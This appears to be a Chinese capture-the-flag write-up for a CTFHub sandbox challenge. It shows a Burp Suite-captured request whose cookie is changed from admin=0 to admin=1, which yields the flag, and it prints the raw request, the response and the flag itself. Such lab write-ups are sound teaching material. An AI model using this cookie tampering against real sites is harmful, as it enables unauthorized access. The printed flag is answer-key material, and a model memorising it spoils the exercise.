点击此处获得更好的阅读体验
本WP来自ctfhubug
原创投稿
题目考点
解题思路
挂上 BurpSuite 之后访问题目页面,在“代理-HTTP历史”里可以看到两个GET请求
其中第二个GET请求访问http://challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080/favicon.ico
1 2 3 4 5 6 7 8 9
| GET /favicon.ico HTTP/1.1 Host: challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 Accept: image/webp,image/apng,image/*,*/*;q=0.8 Referer: http://challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: admin=0 Connection: close
|
把这个请求放入“重发器”修改Cookie: admin=0为Cookie: admin=1后发送获得响应页面里包含Flag
1 2 3 4 5 6 7 8 9 10 11
| HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Mon, 02 Mar 2020 00:30:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.6.40 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: * Content-Length: 48 ctfhub{5f6a5ebbc9c599b2b1268d0cccb43111049c8364}
|